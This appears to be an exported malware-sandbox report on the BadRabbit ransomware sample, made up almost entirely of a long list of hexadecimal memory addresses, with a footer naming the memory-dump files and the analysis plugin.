                                                                                                          0x008820e5
                                                                                                          0x008820e8
                                                                                                          0x008820f0
                                                                                                          0x008820f5
                                                                                                          0x008820f8
                                                                                                          0x008820f8
                                                                                                          0x008820fb
                                                                                                          0x008820fe
                                                                                                          0x00000000
                                                                                                          0x008820fe
                                                                                                          0x008820ad
                                                                                                          0x008820ad
                                                                                                          0x008820b0
                                                                                                          0x008820b0
                                                                                                          0x008820b0
                                                                                                          0x008820b2
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008820b8
                                                                                                          0x008820b8
                                                                                                          0x008820bc
                                                                                                          0x008820bf
                                                                                                          0x008820c1
                                                                                                          0x008820c3
                                                                                                          0x008820c6
                                                                                                          0x008820c9
                                                                                                          0x008820cb
                                                                                                          0x008820ce
                                                                                                          0x008820cf
                                                                                                          0x008820d2
                                                                                                          0x008820d5
                                                                                                          0x008820d8
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008820d8
                                                                                                          0x00000000
                                                                                                          0x008820b0
                                                                                                          0x00882109
                                                                                                          0x00882120
                                                                                                          0x00882120
                                                                                                          0x00882120
                                                                                                          0x00882124
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088210b
                                                                                                          0x0088210b
                                                                                                          0x0088210e
                                                                                                          0x00882110
                                                                                                          0x00882118
                                                                                                          0x0088211d
                                                                                                          0x0088211d
                                                                                                          0x0088211d
                                                                                                          0x0088211d
                                                                                                          0x00882126
                                                                                                          0x00882126
                                                                                                          0x0088212c
                                                                                                          0x0088212f
                                                                                                          0x00882132
                                                                                                          0x00882134
                                                                                                          0x00882137
                                                                                                          0x0088213d
                                                                                                          0x00882148
                                                                                                          0x0088214e
                                                                                                          0x00882156
                                                                                                          0x00882159
                                                                                                          0x0088215b
                                                                                                          0x0088216f
                                                                                                          0x0088216f
                                                                                                          0x00882173
                                                                                                          0x00000000
                                                                                                          0x00882173
                                                                                                          0x0088215d
                                                                                                          0x0088215d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088232f
                                                                                                          0x0088232f
                                                                                                          0x00882332
                                                                                                          0x00882335
                                                                                                          0x00882338
                                                                                                          0x0088233b
                                                                                                          0x0088233d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008821a1
                                                                                                          0x008821a1
                                                                                                          0x008821a1
                                                                                                          0x008821a4
                                                                                                          0x008821a6
                                                                                                          0x008821aa
                                                                                                          0x008821ac
                                                                                                          0x008821ad
                                                                                                          0x008821b0
                                                                                                          0x008821b5
                                                                                                          0x008821b8
                                                                                                          0x008821bb
                                                                                                          0x008821be
                                                                                                          0x008821c0
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088217e
                                                                                                          0x0088217e
                                                                                                          0x00882181
                                                                                                          0x00882183
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882189
                                                                                                          0x00882189
                                                                                                          0x0088218d
                                                                                                          0x00882190
                                                                                                          0x00882195
                                                                                                          0x00882197
                                                                                                          0x0088219b
                                                                                                          0x0088219e
                                                                                                          0x0088219e
                                                                                                          0x0088219e
                                                                                                          0x008821c2
                                                                                                          0x008821c2
                                                                                                          0x008821c4
                                                                                                          0x008821c6
                                                                                                          0x008821c9
                                                                                                          0x008821ca
                                                                                                          0x008821cd
                                                                                                          0x008821ed
                                                                                                          0x008821ed
                                                                                                          0x0088225e
                                                                                                          0x0088225e
                                                                                                          0x00882261
                                                                                                          0x00882263
                                                                                                          0x00882264
                                                                                                          0x00882268
                                                                                                          0x0088226b
                                                                                                          0x008822b5
                                                                                                          0x008822b5
                                                                                                          0x008822b8
                                                                                                          0x008822b8
                                                                                                          0x008822b8
                                                                                                          0x008822b8
                                                                                                          0x008822bb
                                                                                                          0x008822bd
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008822bf
                                                                                                          0x008822bf
                                                                                                          0x008822c2
                                                                                                          0x008822c4
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008822ca
                                                                                                          0x008822ca
                                                                                                          0x008822ce
                                                                                                          0x008822d1
                                                                                                          0x008822d6
                                                                                                          0x008822d8
                                                                                                          0x008822db
                                                                                                          0x008822dd
                                                                                                          0x008822e0
                                                                                                          0x008822e3
                                                                                                          0x008822e3
                                                                                                          0x008822e8
                                                                                                          0x008822e8
                                                                                                          0x008822ea
                                                                                                          0x008822ec
                                                                                                          0x008822ef
                                                                                                          0x008822f2
                                                                                                          0x008822f4
                                                                                                          0x008822f5
                                                                                                          0x008822f8
                                                                                                          0x008822f8
                                                                                                          0x008822fb
                                                                                                          0x008822fb
                                                                                                          0x008822ff
                                                                                                          0x008822ff
                                                                                                          0x00882301
                                                                                                          0x00882304
                                                                                                          0x00882307
                                                                                                          0x0088230a
                                                                                                          0x0088230d
                                                                                                          0x00882310
                                                                                                          0x00882313
                                                                                                          0x00882315
                                                                                                          0x00882351
                                                                                                          0x00882351
                                                                                                          0x00882358
                                                                                                          0x0088235e
                                                                                                          0x0088235e
                                                                                                          0x00882361
                                                                                                          0x00881dbf
                                                                                                          0x00881dbf
                                                                                                          0x00000000
                                                                                                          0x00881dbf
                                                                                                          0x00882367
                                                                                                          0x00882367
                                                                                                          0x00882369
                                                                                                          0x00882370
                                                                                                          0x0088237e
                                                                                                          0x0088237e
                                                                                                          0x00882384
                                                                                                          0x00882387
                                                                                                          0x0088238a
                                                                                                          0x0088238c
                                                                                                          0x0088238f
                                                                                                          0x00882395
                                                                                                          0x008823a1
                                                                                                          0x008823a7
                                                                                                          0x008823af
                                                                                                          0x008823b2
                                                                                                          0x008823b4
                                                                                                          0x008823c2
                                                                                                          0x008823c2
                                                                                                          0x008823c5
                                                                                                          0x008823c7
                                                                                                          0x008823ca
                                                                                                          0x008823d4
                                                                                                          0x008823dc
                                                                                                          0x008823df
                                                                                                          0x008823e5
                                                                                                          0x008823eb
                                                                                                          0x008823f3
                                                                                                          0x008823f6
                                                                                                          0x008823f8
                                                                                                          0x00882406
                                                                                                          0x00882406
                                                                                                          0x0088240a
                                                                                                          0x0088240d
                                                                                                          0x00882413
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882419
                                                                                                          0x00882419
                                                                                                          0x00000000
                                                                                                          0x00882419
                                                                                                          0x008823fa
                                                                                                          0x008823fa
                                                                                                          0x00882164
                                                                                                          0x00882164
                                                                                                          0x00000000
                                                                                                          0x00882164
                                                                                                          0x008823b6
                                                                                                          0x008823b6
                                                                                                          0x00000000
                                                                                                          0x008823b6
                                                                                                          0x00882372
                                                                                                          0x00882372
                                                                                                          0x00000000
                                                                                                          0x00882372
                                                                                                          0x00882317
                                                                                                          0x00882317
                                                                                                          0x0088231a
                                                                                                          0x0088231c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088231e
                                                                                                          0x0088231e
                                                                                                          0x00882321
                                                                                                          0x00882321
                                                                                                          0x00882321
                                                                                                          0x00882324
                                                                                                          0x00882329
                                                                                                          0x0088232c
                                                                                                          0x0088232c
                                                                                                          0x0088232c
                                                                                                          0x00000000
                                                                                                          0x00882321
                                                                                                          0x0088226d
                                                                                                          0x0088226d
                                                                                                          0x00882270
                                                                                                          0x00882270
                                                                                                          0x00882270
                                                                                                          0x00882270
                                                                                                          0x00882273
                                                                                                          0x00882275
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882277
                                                                                                          0x00882277
                                                                                                          0x0088227a
                                                                                                          0x0088227c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882282
                                                                                                          0x00882282
                                                                                                          0x00882286
                                                                                                          0x00882289
                                                                                                          0x0088228e
                                                                                                          0x00882290
                                                                                                          0x00882293
                                                                                                          0x00882295
                                                                                                          0x00882298
                                                                                                          0x0088229b
                                                                                                          0x0088229b
                                                                                                          0x008822a0
                                                                                                          0x008822a0
                                                                                                          0x008822a2
                                                                                                          0x008822a4
                                                                                                          0x008822a7
                                                                                                          0x008822aa
                                                                                                          0x008822ac
                                                                                                          0x008822ad
                                                                                                          0x008822b0
                                                                                                          0x00000000
                                                                                                          0x008822b0
                                                                                                          0x008821ef
                                                                                                          0x008821f1
                                                                                                          0x008821f4
                                                                                                          0x008821f7
                                                                                                          0x008821fa
                                                                                                          0x008821fd
                                                                                                          0x008821ff
                                                                                                          0x00882228
                                                                                                          0x00882228
                                                                                                          0x0088222b
                                                                                                          0x0088222e
                                                                                                          0x00882231
                                                                                                          0x00882233
                                                                                                          0x00882235
                                                                                                          0x00882238
                                                                                                          0x0088223b
                                                                                                          0x0088223d
                                                                                                          0x00882345
                                                                                                          0x00882345
                                                                                                          0x00000000
                                                                                                          0x00882345
                                                                                                          0x00882243
                                                                                                          0x00882243
                                                                                                          0x00882248
                                                                                                          0x0088224a
                                                                                                          0x0088224d
                                                                                                          0x00882250
                                                                                                          0x00882253
                                                                                                          0x00882256
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882201
                                                                                                          0x00882201
                                                                                                          0x00882201
                                                                                                          0x00882204
                                                                                                          0x00882206
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088220c
                                                                                                          0x0088220d
                                                                                                          0x00882210
                                                                                                          0x00882213
                                                                                                          0x00882216
                                                                                                          0x00882218
                                                                                                          0x0088221a
                                                                                                          0x0088221d
                                                                                                          0x00882220
                                                                                                          0x00882223
                                                                                                          0x00882226
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882226
                                                                                                          0x00000000
                                                                                                          0x00882201
                                                                                                          0x008821cf
                                                                                                          0x008821cf
                                                                                                          0x008821d2
                                                                                                          0x008821d5
                                                                                                          0x008821d8
                                                                                                          0x008821da
                                                                                                          0x008821dd
                                                                                                          0x008821e0
                                                                                                          0x008821e5
                                                                                                          0x008821e5
                                                                                                          0x00882343
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088241c
                                                                                                          0x0088241c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882422
                                                                                                          0x00882422
                                                                                                          0x00882425
                                                                                                          0x0088248e
                                                                                                          0x0088248e
                                                                                                          0x00882491
                                                                                                          0x00882494
                                                                                                          0x0088249b
                                                                                                          0x008824a0
                                                                                                          0x008824a1
                                                                                                          0x008824a3
                                                                                                          0x008824a6
                                                                                                          0x008824a7
                                                                                                          0x008824a9
                                                                                                          0x008824ea
                                                                                                          0x008824ea
                                                                                                          0x008824ec
                                                                                                          0x008824ef
                                                                                                          0x008824f2
                                                                                                          0x008824f4
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008824ae
                                                                                                          0x008824ae
                                                                                                          0x008824b1
                                                                                                          0x008824b3
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008824b9
                                                                                                          0x008824b9
                                                                                                          0x008824bd
                                                                                                          0x008824c0
                                                                                                          0x008824c2
                                                                                                          0x008824c5
                                                                                                          0x008824cb
                                                                                                          0x008824cd
                                                                                                          0x008824d0
                                                                                                          0x008824d2
                                                                                                          0x008824d5
                                                                                                          0x008824d8
                                                                                                          0x008824dd
                                                                                                          0x008824e0
                                                                                                          0x008824e1
                                                                                                          0x008824e1
                                                                                                          0x008824e4
                                                                                                          0x008824e7
                                                                                                          0x008824e7
                                                                                                          0x008824f6
                                                                                                          0x008824f6
                                                                                                          0x008824f8
                                                                                                          0x008825b2
                                                                                                          0x008825b4
                                                                                                          0x008825b7
                                                                                                          0x008825ba
                                                                                                          0x008825c0
                                                                                                          0x008825c2
                                                                                                          0x008825c4
                                                                                                          0x008825c6
                                                                                                          0x008825c9
                                                                                                          0x008825cc
                                                                                                          0x008825cf
                                                                                                          0x008825d2
                                                                                                          0x008825d4
                                                                                                          0x008825e1
                                                                                                          0x008825e1
                                                                                                          0x008825e3
                                                                                                          0x008825f7
                                                                                                          0x008825f7
                                                                                                          0x008825fa
                                                                                                          0x008825fc
                                                                                                          0x0088260a
                                                                                                          0x0088260a
                                                                                                          0x0088260d
                                                                                                          0x0088260d
                                                                                                          0x00882610
                                                                                                          0x00882616
                                                                                                          0x00000000
                                                                                                          0x00882616
                                                                                                          0x008825fe
                                                                                                          0x008825fe
                                                                                                          0x00881953
                                                                                                          0x00881953
                                                                                                          0x00000000
                                                                                                          0x00881953
                                                                                                          0x008825e5
                                                                                                          0x008825e5
                                                                                                          0x008825ec
                                                                                                          0x00000000
                                                                                                          0x008825ec
                                                                                                          0x008825d6
                                                                                                          0x008825d6
                                                                                                          0x00000000
                                                                                                          0x008825d6
                                                                                                          0x008824fe
                                                                                                          0x008824fe
                                                                                                          0x00882500
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882506
                                                                                                          0x00882506
                                                                                                          0x00882508
                                                                                                          0x0088250b
                                                                                                          0x0088250d
                                                                                                          0x0088250e
                                                                                                          0x00882511
                                                                                                          0x00882513
                                                                                                          0x00882516
                                                                                                          0x00882518
                                                                                                          0x0088251b
                                                                                                          0x0088251d
                                                                                                          0x0088251f
                                                                                                          0x00882520
                                                                                                          0x00882526
                                                                                                          0x00882528
                                                                                                          0x0088252b
                                                                                                          0x0088252d
                                                                                                          0x00882530
                                                                                                          0x00882532
                                                                                                          0x00882535
                                                                                                          0x00882538
                                                                                                          0x0088253b
                                                                                                          0x0088253e
                                                                                                          0x00882541
                                                                                                          0x00882543
                                                                                                          0x00882545
                                                                                                          0x0088259f
                                                                                                          0x0088259f
                                                                                                          0x008825a2
                                                                                                          0x008825a5
                                                                                                          0x008825a8
                                                                                                          0x008825aa
                                                                                                          0x008825aa
                                                                                                          0x008825ac
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882547
                                                                                                          0x00882547
                                                                                                          0x00882547
                                                                                                          0x0088254a
                                                                                                          0x0088254c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882552
                                                                                                          0x00882552
                                                                                                          0x00882553
                                                                                                          0x00882555
                                                                                                          0x00882558
                                                                                                          0x0088255b
                                                                                                          0x0088255e
                                                                                                          0x00882561
                                                                                                          0x00882567
                                                                                                          0x00882569
                                                                                                          0x0088256c
                                                                                                          0x0088256d
                                                                                                          0x00882571
                                                                                                          0x00882576
                                                                                                          0x0088257a
                                                                                                          0x0088257c
                                                                                                          0x0088257e
                                                                                                          0x00882581
                                                                                                          0x00882584
                                                                                                          0x00882586
                                                                                                          0x00882588
                                                                                                          0x0088258b
                                                                                                          0x00882590
                                                                                                          0x00882593
                                                                                                          0x00882596
                                                                                                          0x00882598
                                                                                                          0x0088259b
                                                                                                          0x0088259d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088259d
                                                                                                          0x00000000
                                                                                                          0x00882547
                                                                                                          0x00882427
                                                                                                          0x00882427
                                                                                                          0x0088242a
                                                                                                          0x0088242f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882431
                                                                                                          0x00882431
                                                                                                          0x00882434
                                                                                                          0x00882437
                                                                                                          0x0088243a
                                                                                                          0x0088243d
                                                                                                          0x00882440
                                                                                                          0x00882443
                                                                                                          0x00882445
                                                                                                          0x00882448
                                                                                                          0x00882449
                                                                                                          0x0088244c
                                                                                                          0x0088244f
                                                                                                          0x00882454
                                                                                                          0x00882457
                                                                                                          0x0088245a
                                                                                                          0x0088245d
                                                                                                          0x00882460
                                                                                                          0x00882461
                                                                                                          0x00882464
                                                                                                          0x00882467
                                                                                                          0x00882468
                                                                                                          0x0088246b
                                                                                                          0x0088246e
                                                                                                          0x00882470
                                                                                                          0x00882473
                                                                                                          0x00882476
                                                                                                          0x00882479
                                                                                                          0x0088247c
                                                                                                          0x00882482
                                                                                                          0x00882482
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882619
                                                                                                          0x00882619
                                                                                                          0x0088261c
                                                                                                          0x0088261e
                                                                                                          0x0088266d
                                                                                                          0x0088266d
                                                                                                          0x00882670
                                                                                                          0x00882676
                                                                                                          0x00000000
                                                                                                          0x00882676
                                                                                                          0x00882620
                                                                                                          0x00882620
                                                                                                          0x00882622
                                                                                                          0x00882650
                                                                                                          0x00882650
                                                                                                          0x00882652
                                                                                                          0x00882654
                                                                                                          0x00882655
                                                                                                          0x00882659
                                                                                                          0x0088265a
                                                                                                          0x0088265d
                                                                                                          0x0088265f
                                                                                                          0x00882661
                                                                                                          0x00882664
                                                                                                          0x00882664
                                                                                                          0x00882664
                                                                                                          0x0088266a
                                                                                                          0x00000000
                                                                                                          0x0088266a
                                                                                                          0x00882624
                                                                                                          0x00882624
                                                                                                          0x00882627
                                                                                                          0x00882627
                                                                                                          0x00882627
                                                                                                          0x00882629
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088262f
                                                                                                          0x0088262f
                                                                                                          0x00882633
                                                                                                          0x00882636
                                                                                                          0x00882638
                                                                                                          0x0088263a
                                                                                                          0x0088263d
                                                                                                          0x00882640
                                                                                                          0x00882642
                                                                                                          0x00882645
                                                                                                          0x00882646
                                                                                                          0x00882649
                                                                                                          0x0088264c
                                                                                                          0x0088264e
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088264e
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088267c
                                                                                                          0x0088267c
                                                                                                          0x0088267f
                                                                                                          0x00882681
                                                                                                          0x00882685
                                                                                                          0x00882687
                                                                                                          0x00882688
                                                                                                          0x0088268b
                                                                                                          0x0088268d
                                                                                                          0x00882692
                                                                                                          0x00882695
                                                                                                          0x00882698
                                                                                                          0x0088269a
                                                                                                          0x008826e4
                                                                                                          0x008826e4
                                                                                                          0x008826e6
                                                                                                          0x00882795
                                                                                                          0x00882795
                                                                                                          0x0088279a
                                                                                                          0x0088279d
                                                                                                          0x008827a0
                                                                                                          0x008827a6
                                                                                                          0x008827a8
                                                                                                          0x008827aa
                                                                                                          0x008827ad
                                                                                                          0x008827b0
                                                                                                          0x008827b2
                                                                                                          0x008827c0
                                                                                                          0x008827c0
                                                                                                          0x008827c2
                                                                                                          0x008827c8
                                                                                                          0x008827cb
                                                                                                          0x008827ce
                                                                                                          0x008827ce
                                                                                                          0x008827d1
                                                                                                          0x008827d4
                                                                                                          0x00000000
                                                                                                          0x008827d4
                                                                                                          0x008827b4
                                                                                                          0x008827b4
                                                                                                          0x00000000
                                                                                                          0x008827b4
                                                                                                          0x008826ec
                                                                                                          0x008826ec
                                                                                                          0x008826ee
                                                                                                          0x008826f1
                                                                                                          0x008826f3
                                                                                                          0x008826f4
                                                                                                          0x008826f7
                                                                                                          0x008826f9
                                                                                                          0x008826fc
                                                                                                          0x008826fe
                                                                                                          0x00882701
                                                                                                          0x00882703
                                                                                                          0x00882705
                                                                                                          0x00882706
                                                                                                          0x0088270c
                                                                                                          0x0088270e
                                                                                                          0x00882711
                                                                                                          0x00882713
                                                                                                          0x00882716
                                                                                                          0x00882718
                                                                                                          0x0088271b
                                                                                                          0x0088271e
                                                                                                          0x00882721
                                                                                                          0x00882724
                                                                                                          0x00882727
                                                                                                          0x00882729
                                                                                                          0x0088272b
                                                                                                          0x00882785
                                                                                                          0x00882785
                                                                                                          0x00882788
                                                                                                          0x0088278b
                                                                                                          0x0088278d
                                                                                                          0x0088278f
                                                                                                          0x0088278f
                                                                                                          0x0088278f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088272d
                                                                                                          0x0088272d
                                                                                                          0x0088272d
                                                                                                          0x00882730
                                                                                                          0x00882732
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882738
                                                                                                          0x00882738
                                                                                                          0x00882739
                                                                                                          0x0088273b
                                                                                                          0x0088273e
                                                                                                          0x00882741
                                                                                                          0x00882744
                                                                                                          0x00882747
                                                                                                          0x0088274d
                                                                                                          0x0088274f
                                                                                                          0x00882752
                                                                                                          0x00882753
                                                                                                          0x00882757
                                                                                                          0x0088275c
                                                                                                          0x00882760
                                                                                                          0x00882762
                                                                                                          0x00882764
                                                                                                          0x00882767
                                                                                                          0x0088276a
                                                                                                          0x0088276c
                                                                                                          0x0088276e
                                                                                                          0x00882771
                                                                                                          0x00882776
                                                                                                          0x00882779
                                                                                                          0x0088277c
                                                                                                          0x0088277e
                                                                                                          0x00882781
                                                                                                          0x00882783
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882783
                                                                                                          0x00000000
                                                                                                          0x0088272d
                                                                                                          0x0088269c
                                                                                                          0x0088269c
                                                                                                          0x0088269f
                                                                                                          0x0088269f
                                                                                                          0x0088269f
                                                                                                          0x008826a1
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008826a7
                                                                                                          0x008826a7
                                                                                                          0x008826aa
                                                                                                          0x008826ac
                                                                                                          0x008826ad
                                                                                                          0x008826b0
                                                                                                          0x008826b3
                                                                                                          0x008826b9
                                                                                                          0x008826bb
                                                                                                          0x008826be
                                                                                                          0x008826c0
                                                                                                          0x008826c3
                                                                                                          0x008826c6
                                                                                                          0x008826cb
                                                                                                          0x008826ce
                                                                                                          0x008826cf
                                                                                                          0x008826d2
                                                                                                          0x008826d5
                                                                                                          0x008826d7
                                                                                                          0x008826dd
                                                                                                          0x008826e0
                                                                                                          0x008826e2
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008826e2
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008827d7
                                                                                                          0x008827d7
                                                                                                          0x008827da
                                                                                                          0x008827dc
                                                                                                          0x0088282c
                                                                                                          0x0088282c
                                                                                                          0x00000000
                                                                                                          0x0088282c
                                                                                                          0x008827de
                                                                                                          0x008827de
                                                                                                          0x008827e0
                                                                                                          0x00882811
                                                                                                          0x00882811
                                                                                                          0x00882813
                                                                                                          0x00882815
                                                                                                          0x00882816
                                                                                                          0x0088281b
                                                                                                          0x0088281c
                                                                                                          0x0088281e
                                                                                                          0x00882820
                                                                                                          0x00882823
                                                                                                          0x00882823
                                                                                                          0x00882823
                                                                                                          0x00882829
                                                                                                          0x00000000
                                                                                                          0x00882829
                                                                                                          0x008827e2
                                                                                                          0x008827e2
                                                                                                          0x008827e5
                                                                                                          0x008827e5
                                                                                                          0x008827e5
                                                                                                          0x008827e8
                                                                                                          0x008827ea
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008827f0
                                                                                                          0x008827f0
                                                                                                          0x008827f4
                                                                                                          0x008827f7
                                                                                                          0x008827f9
                                                                                                          0x008827fb
                                                                                                          0x008827fe
                                                                                                          0x00882801
                                                                                                          0x00882803
                                                                                                          0x00882806
                                                                                                          0x00882807
                                                                                                          0x0088280a
                                                                                                          0x0088280d
                                                                                                          0x0088280f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088280f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882832
                                                                                                          0x00882832
                                                                                                          0x00882835
                                                                                                          0x00882837
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088283d
                                                                                                          0x0088283d
                                                                                                          0x00882840
                                                                                                          0x00882842
                                                                                                          0x00882845
                                                                                                          0x00882847
                                                                                                          0x00882888
                                                                                                          0x00882888
                                                                                                          0x0088288b
                                                                                                          0x0088288b
                                                                                                          0x0088288d
                                                                                                          0x00882890
                                                                                                          0x00882893
                                                                                                          0x00882893
                                                                                                          0x00882895
                                                                                                          0x00882895
                                                                                                          0x00882898
                                                                                                          0x0088289a
                                                                                                          0x0088289d
                                                                                                          0x0088289f
                                                                                                          0x008828a1
                                                                                                          0x008828a4
                                                                                                          0x008828a7
                                                                                                          0x008828aa
                                                                                                          0x008828ad
                                                                                                          0x008828ad
                                                                                                          0x008828af
                                                                                                          0x008828af
                                                                                                          0x008828af
                                                                                                          0x008828b2
                                                                                                          0x008828b4
                                                                                                          0x008828b5
                                                                                                          0x008828b5
                                                                                                          0x008828b5
                                                                                                          0x008828b8
                                                                                                          0x008828bb
                                                                                                          0x008828be
                                                                                                          0x008828c1
                                                                                                          0x008828c4
                                                                                                          0x008828ca
                                                                                                          0x008828ca
                                                                                                          0x00000000
                                                                                                          0x008828c4
                                                                                                          0x00882849
                                                                                                          0x00882849
                                                                                                          0x0088284b
                                                                                                          0x0088284e
                                                                                                          0x00882865
                                                                                                          0x00882865
                                                                                                          0x00882868
                                                                                                          0x0088286b
                                                                                                          0x00882877
                                                                                                          0x00882879
                                                                                                          0x00882879
                                                                                                          0x0088286d
                                                                                                          0x0088286d
                                                                                                          0x00882870
                                                                                                          0x00882873
                                                                                                          0x00882873
                                                                                                          0x0088287c
                                                                                                          0x0088287f
                                                                                                          0x00882882
                                                                                                          0x00882884
                                                                                                          0x00000000
                                                                                                          0x00882886
                                                                                                          0x00882886
                                                                                                          0x00000000
                                                                                                          0x00882886
                                                                                                          0x00882884
                                                                                                          0x00882850
                                                                                                          0x00882850
                                                                                                          0x00882857
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882859
                                                                                                          0x00882859
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008828d5
                                                                                                          0x008828d5
                                                                                                          0x008828d9
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008828df
                                                                                                          0x008828df
                                                                                                          0x008828e2
                                                                                                          0x008828e5
                                                                                                          0x008828e8
                                                                                                          0x008828eb
                                                                                                          0x008828ed
                                                                                                          0x008828f0
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008828fb
                                                                                                          0x008828fb
                                                                                                          0x008828ff
                                                                                                          0x00882900
                                                                                                          0x00000000
                                                                                                          0x008829c8
                                                                                                          0x008829c8
                                                                                                          0x008829ca
                                                                                                          0x008829cd
                                                                                                          0x00882a3e
                                                                                                          0x00882a3e
                                                                                                          0x00000000
                                                                                                          0x00882a3e
                                                                                                          0x008829cf
                                                                                                          0x008829cf
                                                                                                          0x008829d2
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008829d4
                                                                                                          0x008829d4
                                                                                                          0x008829d7
                                                                                                          0x00882a07
                                                                                                          0x00882a07
                                                                                                          0x00882a0a
                                                                                                          0x00882a39
                                                                                                          0x00882a39
                                                                                                          0x00882a3c
                                                                                                          0x00000000
                                                                                                          0x00882a3c
                                                                                                          0x00882a0c
                                                                                                          0x00882a0c
                                                                                                          0x00881899
                                                                                                          0x00881899
                                                                                                          0x00881dc2
                                                                                                          0x00881dc2
                                                                                                          0x00000000
                                                                                                          0x00881dc2
                                                                                                          0x008829d9
                                                                                                          0x008829d9
                                                                                                          0x008829dc
                                                                                                          0x008829dc
                                                                                                          0x008829dc
                                                                                                          0x008829de
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008829e0
                                                                                                          0x008829e0
                                                                                                          0x008829e4
                                                                                                          0x008829e7
                                                                                                          0x008829e9
                                                                                                          0x008829eb
                                                                                                          0x008829ee
                                                                                                          0x008829f1
                                                                                                          0x008829f3
                                                                                                          0x008829f6
                                                                                                          0x008829f7
                                                                                                          0x008829fa
                                                                                                          0x008829fd
                                                                                                          0x00882a00
                                                                                                          0x00882a03
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882a05
                                                                                                          0x00882a05
                                                                                                          0x00882a05
                                                                                                          0x00000000
                                                                                                          0x00882a05
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882a44
                                                                                                          0x00882a44
                                                                                                          0x00882a46
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882a49
                                                                                                          0x00882a49
                                                                                                          0x00882a4b
                                                                                                          0x00882a4c
                                                                                                          0x00882a4c
                                                                                                          0x00882a4f
                                                                                                          0x00882a4f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008817be
                                                                                                          0x00881dd0
                                                                                                          0x00881dd0
                                                                                                          0x00000000
                                                                                                          0x00881dd0
                                                                                                          0x00881fcd
                                                                                                          0x00881fcf
                                                                                                          0x00881fd5
                                                                                                          0x00881fd9
                                                                                                          0x00881fde
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00881fe4
                                                                                                          0x00881feb
                                                                                                          0x00881ff0
                                                                                                          0x00881ff3
                                                                                                          0x00881ff9
                                                                                                          0x00881ffc
                                                                                                          0x00881ffe
                                                                                                          0x00882001
                                                                                                          0x00882004
                                                                                                          0x00882007
                                                                                                          0x0088200a
                                                                                                          0x00000000
                                                                                                          0x0088200a
                                                                                                          0x00881f92
                                                                                                          0x00881f92
                                                                                                          0x00000000
                                                                                                          0x00881f92

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.328686156.0000000000881000.00000020.00000001.01000000.00000006.sdmp, Offset: 00880000, based on PE: true
                                                                                                          • Associated: 00000001.00000002.328679067.0000000000880000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328695785.0000000000884000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328877255.0000000000889000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_880000_Endermanch@BadRabbit.jbxd
